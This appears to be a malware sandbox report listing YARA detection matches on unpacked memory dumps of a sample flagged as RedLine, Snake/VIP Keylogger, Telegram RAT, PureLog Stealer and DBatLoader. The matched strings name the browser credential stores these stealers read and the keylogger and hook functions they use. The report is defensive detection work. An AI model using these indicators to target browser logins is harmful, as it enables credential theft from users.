7.1.nhpoymuP.pif.400000.0.unpack	MALWARE_Win_RedLine	Detects RedLine infostealer	ditekSHen	0x1d0b0:$s1: 23 00 2B 00 33 00 3B 00 43 00 53 00 63 00 73 00 0x80:$s2: 68 10 84 2D 2C 71 EA 7E 2C 71 EA 7E 2C 71 EA 7E 32 23 7F 7E 3F 71 EA 7E 0B B7 91 7E 2B 71 EA 7E 2C 71 EB 7E 5C 71 EA 7E 32 23 6E 7E 1C 71 EA 7E 32 23 69 7E A2 71 EA 7E 32 23 7B 7E 2D 71 EA 7E 0x700:$s3: 83 EC 38 53 B0 B6 88 44 24 2B 88 44 24 2F B0 D9 88 44 24 30 88 44 24 31 88 44 24 33 55 56 8B F1 B8 0C 00 FE FF 2B C6 89 44 24 14 B8 0D 00 FE FF 2B C6 89 44 24 1C B8 02 00 FE FF 2B C6 89 44 24 ... 0x1ed8a:$s4: B\|BxBtBpBlBhBdB`B\BXBTBPBLBHBDB@B<B8B4B0B,B(B$B B 0x1e9d0:$s5: delete[] 0x1de88:$s6: constructor or from DllMain.
3.2.nhpoymuP.pif.2f3499de.2.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
3.2.nhpoymuP.pif.2f3499de.2.raw.unpack	JoeSecurity_GenericDownloader_1	Yara detected Generic Downloader	Joe Security
3.2.nhpoymuP.pif.2f3499de.2.raw.unpack	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
3.2.nhpoymuP.pif.2f3499de.2.raw.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
3.2.nhpoymuP.pif.2f3499de.2.raw.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
14.2.nhpoymuP.pif.28470000.3.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
14.2.nhpoymuP.pif.28470000.3.unpack	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
14.2.nhpoymuP.pif.28470000.3.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
14.2.nhpoymuP.pif.28470000.3.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
3.2.nhpoymuP.pif.2f3499de.2.raw.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x3f76a:$a1: get_encryptedPassword 0x3f73e:$a2: get_encryptedUsername 0x3f802:$a3: get_timePasswordChanged 0x3f71a:$a4: get_passwordField 0x3f780:$a5: set_encryptedPassword 0x3f54d:$a7: get_logins 0x3ab9a:$a10: KeyLoggerEventArgs 0x3ab69:$a11: KeyLoggerEventArgsEventHandler 0x3f621:$a13: _encryptedPassword
14.2.nhpoymuP.pif.28470000.3.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x3d96a:$a1: get_encryptedPassword 0x3d93e:$a2: get_encryptedUsername 0x3da02:$a3: get_timePasswordChanged 0x3d91a:$a4: get_passwordField 0x3d980:$a5: set_encryptedPassword 0x3d74d:$a7: get_logins 0x38d9a:$a10: KeyLoggerEventArgs 0x38d69:$a11: KeyLoggerEventArgsEventHandler 0x3d821:$a13: _encryptedPassword
3.2.nhpoymuP.pif.2f3499de.2.raw.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x4a86e:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x49f11:$a3: \Google\Chrome\User Data\Default\Login Data 0x4a16e:$a4: \Orbitum\User Data\Default\Login Data 0x4ab4d:$a5: \Kometa\User Data\Default\Login Data
14.2.nhpoymuP.pif.28470000.3.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x48a6e:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x48111:$a3: \Google\Chrome\User Data\Default\Login Data 0x4836e:$a4: \Orbitum\User Data\Default\Login Data 0x48d4d:$a5: \Kometa\User Data\Default\Login Data
3.2.nhpoymuP.pif.2f3499de.2.raw.unpack	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x3d312:$s1: UnHook 0x3d2ae:$s2: SetHook 0x3d2e7:$s3: CallNextHook 0x3d276:$s4: _hook
14.2.nhpoymuP.pif.28470000.3.unpack	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x3b512:$s1: UnHook 0x3b4ae:$s2: SetHook 0x3b4e7:$s3: CallNextHook 0x3b476:$s4: _hook
14.2.nhpoymuP.pif.25d299de.2.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
14.2.nhpoymuP.pif.25d299de.2.raw.unpack	JoeSecurity_GenericDownloader_1	Yara detected Generic Downloader	Joe Security
14.2.nhpoymuP.pif.25d299de.2.raw.unpack	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
14.2.nhpoymuP.pif.25d299de.2.raw.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
14.2.nhpoymuP.pif.25d299de.2.raw.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
14.3.nhpoymuP.pif.240bcc58.0.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
14.3.nhpoymuP.pif.240bcc58.0.unpack	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
14.3.nhpoymuP.pif.240bcc58.0.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
14.3.nhpoymuP.pif.240bcc58.0.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
14.2.nhpoymuP.pif.25d299de.2.raw.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x3f76a:$a1: get_encryptedPassword 0x3f73e:$a2: get_encryptedUsername 0x3f802:$a3: get_timePasswordChanged 0x3f71a:$a4: get_passwordField 0x3f780:$a5: set_encryptedPassword 0x3f54d:$a7: get_logins 0x3ab9a:$a10: KeyLoggerEventArgs 0x3ab69:$a11: KeyLoggerEventArgsEventHandler 0x3f621:$a13: _encryptedPassword
14.3.nhpoymuP.pif.240bcc58.0.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x3ca82:$a1: get_encryptedPassword 0x3ca56:$a2: get_encryptedUsername 0x3cb1a:$a3: get_timePasswordChanged 0x3ca32:$a4: get_passwordField 0x3ca98:$a5: set_encryptedPassword 0x3c865:$a7: get_logins 0x37eb2:$a10: KeyLoggerEventArgs 0x37e81:$a11: KeyLoggerEventArgsEventHandler 0x3c939:$a13: _encryptedPassword
14.3.nhpoymuP.pif.240bcc58.0.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x47b86:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x47229:$a3: \Google\Chrome\User Data\Default\Login Data 0x47486:$a4: \Orbitum\User Data\Default\Login Data 0x47e65:$a5: \Kometa\User Data\Default\Login Data
14.3.nhpoymuP.pif.240bcc58.0.unpack	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x3a62a:$s1: UnHook 0x3a5c6:$s2: SetHook 0x3a5ff:$s3: CallNextHook 0x3a58e:$s4: _hook
14.2.nhpoymuP.pif.25d299de.2.raw.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x4a86e:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x49f11:$a3: \Google\Chrome\User Data\Default\Login Data 0x4a16e:$a4: \Orbitum\User Data\Default\Login Data 0x4ab4d:$a5: \Kometa\User Data\Default\Login Data
14.2.nhpoymuP.pif.25d299de.2.raw.unpack	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x3d312:$s1: UnHook 0x3d2ae:$s2: SetHook 0x3d2e7:$s3: CallNextHook 0x3d276:$s4: _hook
14.2.nhpoymuP.pif.25d2a8c6.1.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
14.2.nhpoymuP.pif.25d2a8c6.1.unpack	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
14.2.nhpoymuP.pif.25d2a8c6.1.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
14.2.nhpoymuP.pif.25d2a8c6.1.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
7.2.nhpoymuP.pif.27840ee8.4.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
7.2.nhpoymuP.pif.27840ee8.4.raw.unpack	JoeSecurity_GenericDownloader_1	Yara detected Generic Downloader	Joe Security
14.2.nhpoymuP.pif.25d2a8c6.1.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x3ca82:$a1: get_encryptedPassword 0x3ca56:$a2: get_encryptedUsername 0x3cb1a:$a3: get_timePasswordChanged 0x3ca32:$a4: get_passwordField 0x3ca98:$a5: set_encryptedPassword 0x3c865:$a7: get_logins 0x37eb2:$a10: KeyLoggerEventArgs 0x37e81:$a11: KeyLoggerEventArgsEventHandler 0x3c939:$a13: _encryptedPassword
7.2.nhpoymuP.pif.27840ee8.4.raw.unpack	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
7.2.nhpoymuP.pif.27840ee8.4.raw.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
7.2.nhpoymuP.pif.27840ee8.4.raw.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
7.2.nhpoymuP.pif.27840ee8.4.raw.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x3e882:$a1: get_encryptedPassword 0x3e856:$a2: get_encryptedUsername 0x3e91a:$a3: get_timePasswordChanged 0x3e832:$a4: get_passwordField 0x3e898:$a5: set_encryptedPassword 0x3e665:$a7: get_logins 0x39cb2:$a10: KeyLoggerEventArgs 0x39c81:$a11: KeyLoggerEventArgsEventHandler 0x3e739:$a13: _encryptedPassword
7.2.nhpoymuP.pif.27840ee8.4.raw.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x49986:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x49029:$a3: \Google\Chrome\User Data\Default\Login Data 0x49286:$a4: \Orbitum\User Data\Default\Login Data 0x49c65:$a5: \Kometa\User Data\Default\Login Data
7.2.nhpoymuP.pif.27840ee8.4.raw.unpack	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x3c42a:$s1: UnHook 0x3c3c6:$s2: SetHook 0x3c3ff:$s3: CallNextHook 0x3c38e:$s4: _hook
14.2.nhpoymuP.pif.25d299de.2.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
14.2.nhpoymuP.pif.25d299de.2.unpack	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
14.2.nhpoymuP.pif.25d299de.2.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
14.2.nhpoymuP.pif.25d299de.2.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
3.2.nhpoymuP.pif.2f34a8c6.1.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
3.2.nhpoymuP.pif.2f34a8c6.1.raw.unpack	JoeSecurity_GenericDownloader_1	Yara detected Generic Downloader	Joe Security
3.2.nhpoymuP.pif.2f34a8c6.1.raw.unpack	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
3.2.nhpoymuP.pif.2f34a8c6.1.raw.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
3.2.nhpoymuP.pif.2f34a8c6.1.raw.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
3.3.nhpoymuP.pif.2d7ca218.0.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
3.3.nhpoymuP.pif.2d7ca218.0.unpack	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
3.3.nhpoymuP.pif.2d7ca218.0.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
3.3.nhpoymuP.pif.2d7ca218.0.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
3.3.nhpoymuP.pif.2d7ca218.0.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x3ca82:$a1: get_encryptedPassword 0x3ca56:$a2: get_encryptedUsername 0x3cb1a:$a3: get_timePasswordChanged 0x3ca32:$a4: get_passwordField 0x3ca98:$a5: set_encryptedPassword 0x3c865:$a7: get_logins 0x37eb2:$a10: KeyLoggerEventArgs 0x37e81:$a11: KeyLoggerEventArgsEventHandler 0x3c939:$a13: _encryptedPassword
7.3.nhpoymuP.pif.25817960.0.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
7.3.nhpoymuP.pif.25817960.0.raw.unpack	JoeSecurity_GenericDownloader_1	Yara detected Generic Downloader	Joe Security
7.3.nhpoymuP.pif.25817960.0.raw.unpack	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
7.3.nhpoymuP.pif.25817960.0.raw.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
7.3.nhpoymuP.pif.25817960.0.raw.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
7.3.nhpoymuP.pif.25817960.0.raw.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x3e882:$a1: get_encryptedPassword 0x3e856:$a2: get_encryptedUsername 0x3e91a:$a3: get_timePasswordChanged 0x3e832:$a4: get_passwordField 0x3e898:$a5: set_encryptedPassword 0x3e665:$a7: get_logins 0x39cb2:$a10: KeyLoggerEventArgs 0x39c81:$a11: KeyLoggerEventArgsEventHandler 0x3e739:$a13: _encryptedPassword
7.3.nhpoymuP.pif.25817960.0.raw.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x49986:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x49029:$a3: \Google\Chrome\User Data\Default\Login Data 0x49286:$a4: \Orbitum\User Data\Default\Login Data 0x49c65:$a5: \Kometa\User Data\Default\Login Data
7.3.nhpoymuP.pif.25817960.0.raw.unpack	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x3c42a:$s1: UnHook 0x3c3c6:$s2: SetHook 0x3c3ff:$s3: CallNextHook 0x3c38e:$s4: _hook
3.2.nhpoymuP.pif.306ae390.5.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
3.2.nhpoymuP.pif.306ae390.5.unpack	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
3.2.nhpoymuP.pif.306ae390.5.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
3.2.nhpoymuP.pif.306ae390.5.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
14.2.nhpoymuP.pif.25d299de.2.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x3d96a:$a1: get_encryptedPassword 0x3d93e:$a2: get_encryptedUsername 0x3da02:$a3: get_timePasswordChanged 0x3d91a:$a4: get_passwordField 0x3d980:$a5: set_encryptedPassword 0x3d74d:$a7: get_logins 0x38d9a:$a10: KeyLoggerEventArgs 0x38d69:$a11: KeyLoggerEventArgsEventHandler 0x3d821:$a13: _encryptedPassword
14.2.nhpoymuP.pif.284d0000.5.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
14.2.nhpoymuP.pif.284d0000.5.unpack	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
14.2.nhpoymuP.pif.284d0000.5.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
14.2.nhpoymuP.pif.284d0000.5.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
14.2.nhpoymuP.pif.284d0000.5.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x3ca82:$a1: get_encryptedPassword 0x3ca56:$a2: get_encryptedUsername 0x3cb1a:$a3: get_timePasswordChanged 0x3ca32:$a4: get_passwordField 0x3ca98:$a5: set_encryptedPassword 0x3c865:$a7: get_logins 0x37eb2:$a10: KeyLoggerEventArgs 0x37e81:$a11: KeyLoggerEventArgsEventHandler 0x3c939:$a13: _encryptedPassword
3.2.nhpoymuP.pif.400000.0.raw.unpack	MALWARE_Win_RedLine	Detects RedLine infostealer	ditekSHen	0x1e4b0:$s1: 23 00 2B 00 33 00 3B 00 43 00 53 00 63 00 73 00 0x80:$s2: 68 10 84 2D 2C 71 EA 7E 2C 71 EA 7E 2C 71 EA 7E 32 23 7F 7E 3F 71 EA 7E 0B B7 91 7E 2B 71 EA 7E 2C 71 EB 7E 5C 71 EA 7E 32 23 6E 7E 1C 71 EA 7E 32 23 69 7E A2 71 EA 7E 32 23 7B 7E 2D 71 EA 7E 0x1300:$s3: 83 EC 38 53 B0 B6 88 44 24 2B 88 44 24 2F B0 D9 88 44 24 30 88 44 24 31 88 44 24 33 55 56 8B F1 B8 0C 00 FE FF 2B C6 89 44 24 14 B8 0D 00 FE FF 2B C6 89 44 24 1C B8 02 00 FE FF 2B C6 89 44 24 ... 0x2018a:$s4: B\|BxBtBpBlBhBdB`B\BXBTBPBLBHBDB@B<B8B4B0B,B(B$B B 0x1fdd0:$s5: delete[] 0x1f288:$s6: constructor or from DllMain.
3.2.nhpoymuP.pif.31c30ee8.7.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
3.2.nhpoymuP.pif.31c30ee8.7.raw.unpack	JoeSecurity_GenericDownloader_1	Yara detected Generic Downloader	Joe Security
3.2.nhpoymuP.pif.31c30ee8.7.raw.unpack	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
3.2.nhpoymuP.pif.31c30ee8.7.raw.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
3.2.nhpoymuP.pif.31c30ee8.7.raw.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
0.2.image.exe.2c90000.2.unpack	JoeSecurity_DBatLoader	Yara detected DBatLoader	Joe Security
3.2.nhpoymuP.pif.400000.0.unpack	MALWARE_Win_RedLine	Detects RedLine infostealer	ditekSHen	0x1d0b0:$s1: 23 00 2B 00 33 00 3B 00 43 00 53 00 63 00 73 00 0x80:$s2: 68 10 84 2D 2C 71 EA 7E 2C 71 EA 7E 2C 71 EA 7E 32 23 7F 7E 3F 71 EA 7E 0B B7 91 7E 2B 71 EA 7E 2C 71 EB 7E 5C 71 EA 7E 32 23 6E 7E 1C 71 EA 7E 32 23 69 7E A2 71 EA 7E 32 23 7B 7E 2D 71 EA 7E 0x700:$s3: 83 EC 38 53 B0 B6 88 44 24 2B 88 44 24 2F B0 D9 88 44 24 30 88 44 24 31 88 44 24 33 55 56 8B F1 B8 0C 00 FE FF 2B C6 89 44 24 14 B8 0D 00 FE FF 2B C6 89 44 24 1C B8 02 00 FE FF 2B C6 89 44 24 ... 0x1ed8a:$s4: B\|BxBtBpBlBhBdB`B\BXBTBPBLBHBDB@B<B8B4B0B,B(B$B B 0x1e9d0:$s5: delete[] 0x1de88:$s6: constructor or from DllMain.
14.2.nhpoymuP.pif.25d2a8c6.1.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x47b86:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x47229:$a3: \Google\Chrome\User Data\Default\Login Data 0x47486:$a4: \Orbitum\User Data\Default\Login Data 0x47e65:$a5: \Kometa\User Data\Default\Login Data
14.2.nhpoymuP.pif.25d2a8c6.1.unpack	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x3a62a:$s1: UnHook 0x3a5c6:$s2: SetHook 0x3a5ff:$s3: CallNextHook 0x3a58e:$s4: _hook
0.2.image.exe.24066a8.0.unpack	JoeSecurity_DBatLoader	Yara detected DBatLoader	Joe Security
7.2.nhpoymuP.pif.2750a8c6.1.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
7.2.nhpoymuP.pif.2750a8c6.1.unpack	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
7.2.nhpoymuP.pif.2750a8c6.1.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
7.2.nhpoymuP.pif.2750a8c6.1.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
7.2.nhpoymuP.pif.2750a8c6.1.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x3ca82:$a1: get_encryptedPassword 0x3ca56:$a2: get_encryptedUsername 0x3cb1a:$a3: get_timePasswordChanged 0x3ca32:$a4: get_passwordField 0x3ca98:$a5: set_encryptedPassword 0x3c865:$a7: get_logins 0x37eb2:$a10: KeyLoggerEventArgs 0x37e81:$a11: KeyLoggerEventArgsEventHandler 0x3c939:$a13: _encryptedPassword
3.2.nhpoymuP.pif.306ae390.5.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x3ca82:$a1: get_encryptedPassword 0x3ca56:$a2: get_encryptedUsername 0x3cb1a:$a3: get_timePasswordChanged 0x3ca32:$a4: get_passwordField 0x3ca98:$a5: set_encryptedPassword 0x3c865:$a7: get_logins 0x37eb2:$a10: KeyLoggerEventArgs 0x37e81:$a11: KeyLoggerEventArgsEventHandler 0x3c939:$a13: _encryptedPassword
14.2.nhpoymuP.pif.25d299de.2.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x48a6e:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x48111:$a3: \Google\Chrome\User Data\Default\Login Data 0x4836e:$a4: \Orbitum\User Data\Default\Login Data 0x48d4d:$a5: \Kometa\User Data\Default\Login Data
14.2.nhpoymuP.pif.25d299de.2.unpack	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x3b512:$s1: UnHook 0x3b4ae:$s2: SetHook 0x3b4e7:$s3: CallNextHook 0x3b476:$s4: _hook
14.2.nhpoymuP.pif.28470ee8.4.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
14.2.nhpoymuP.pif.28470ee8.4.raw.unpack	JoeSecurity_GenericDownloader_1	Yara detected Generic Downloader	Joe Security
14.2.nhpoymuP.pif.28470ee8.4.raw.unpack	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
14.2.nhpoymuP.pif.28470ee8.4.raw.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
14.2.nhpoymuP.pif.28470ee8.4.raw.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
14.2.nhpoymuP.pif.28470ee8.4.raw.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x3e882:$a1: get_encryptedPassword 0x3e856:$a2: get_encryptedUsername 0x3e91a:$a3: get_timePasswordChanged 0x3e832:$a4: get_passwordField 0x3e898:$a5: set_encryptedPassword 0x3e665:$a7: get_logins 0x39cb2:$a10: KeyLoggerEventArgs 0x39c81:$a11: KeyLoggerEventArgsEventHandler 0x3e739:$a13: _encryptedPassword
14.2.nhpoymuP.pif.28470ee8.4.raw.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x49986:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x49029:$a3: \Google\Chrome\User Data\Default\Login Data 0x49286:$a4: \Orbitum\User Data\Default\Login Data 0x49c65:$a5: \Kometa\User Data\Default\Login Data
14.2.nhpoymuP.pif.28470ee8.4.raw.unpack	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x3c42a:$s1: UnHook 0x3c3c6:$s2: SetHook 0x3c3ff:$s3: CallNextHook 0x3c38e:$s4: _hook
14.2.nhpoymuP.pif.284d0000.5.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x47b86:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x47229:$a3: \Google\Chrome\User Data\Default\Login Data 0x47486:$a4: \Orbitum\User Data\Default\Login Data 0x47e65:$a5: \Kometa\User Data\Default\Login Data
3.2.nhpoymuP.pif.323b0000.8.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
3.2.nhpoymuP.pif.30655570.3.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
3.2.nhpoymuP.pif.30655570.3.unpack	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
3.2.nhpoymuP.pif.30655570.3.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
3.2.nhpoymuP.pif.30655570.3.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
3.3.nhpoymuP.pif.2d7ca218.0.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
3.3.nhpoymuP.pif.2d7ca218.0.raw.unpack	JoeSecurity_GenericDownloader_1	Yara detected Generic Downloader	Joe Security
3.3.nhpoymuP.pif.2d7ca218.0.raw.unpack	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
3.3.nhpoymuP.pif.2d7ca218.0.raw.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
3.3.nhpoymuP.pif.2d7ca218.0.raw.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
3.3.nhpoymuP.pif.2d7ca218.0.raw.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x3e882:$a1: get_encryptedPassword 0x3e856:$a2: get_encryptedUsername 0x3e91a:$a3: get_timePasswordChanged 0x3e832:$a4: get_passwordField 0x3e898:$a5: set_encryptedPassword 0x3e665:$a7: get_logins 0x39cb2:$a10: KeyLoggerEventArgs 0x39c81:$a11: KeyLoggerEventArgsEventHandler 0x3e739:$a13: _encryptedPassword
3.3.nhpoymuP.pif.2d7ca218.0.raw.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x49986:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x49029:$a3: \Google\Chrome\User Data\Default\Login Data 0x49286:$a4: \Orbitum\User Data\Default\Login Data 0x49c65:$a5: \Kometa\User Data\Default\Login Data
3.3.nhpoymuP.pif.2d7ca218.0.raw.unpack	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x3c42a:$s1: UnHook 0x3c3c6:$s2: SetHook 0x3c3ff:$s3: CallNextHook 0x3c38e:$s4: _hook
3.2.nhpoymuP.pif.2f3499de.2.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
3.2.nhpoymuP.pif.2f3499de.2.unpack	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
3.2.nhpoymuP.pif.2f3499de.2.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
3.2.nhpoymuP.pif.2f3499de.2.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
3.2.nhpoymuP.pif.2f3499de.2.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x3d96a:$a1: get_encryptedPassword 0x3d93e:$a2: get_encryptedUsername 0x3da02:$a3: get_timePasswordChanged 0x3d91a:$a4: get_passwordField 0x3d980:$a5: set_encryptedPassword 0x3d74d:$a7: get_logins 0x38d9a:$a10: KeyLoggerEventArgs 0x38d69:$a11: KeyLoggerEventArgsEventHandler 0x3d821:$a13: _encryptedPassword
3.2.nhpoymuP.pif.2f3499de.2.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x48a6e:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x48111:$a3: \Google\Chrome\User Data\Default\Login Data 0x4836e:$a4: \Orbitum\User Data\Default\Login Data 0x48d4d:$a5: \Kometa\User Data\Default\Login Data
14.2.nhpoymuP.pif.284d0000.5.unpack	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x3a62a:$s1: UnHook 0x3a5c6:$s2: SetHook 0x3a5ff:$s3: CallNextHook 0x3a58e:$s4: _hook
3.2.nhpoymuP.pif.2f3499de.2.unpack	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x3b512:$s1: UnHook 0x3b4ae:$s2: SetHook 0x3b4e7:$s3: CallNextHook 0x3b476:$s4: _hook
3.2.nhpoymuP.pif.323b0000.8.unpack	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
3.2.nhpoymuP.pif.323b0000.8.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
3.2.nhpoymuP.pif.323b0000.8.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
14.2.nhpoymuP.pif.284d0000.5.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
14.2.nhpoymuP.pif.284d0000.5.raw.unpack	JoeSecurity_GenericDownloader_1	Yara detected Generic Downloader	Joe Security
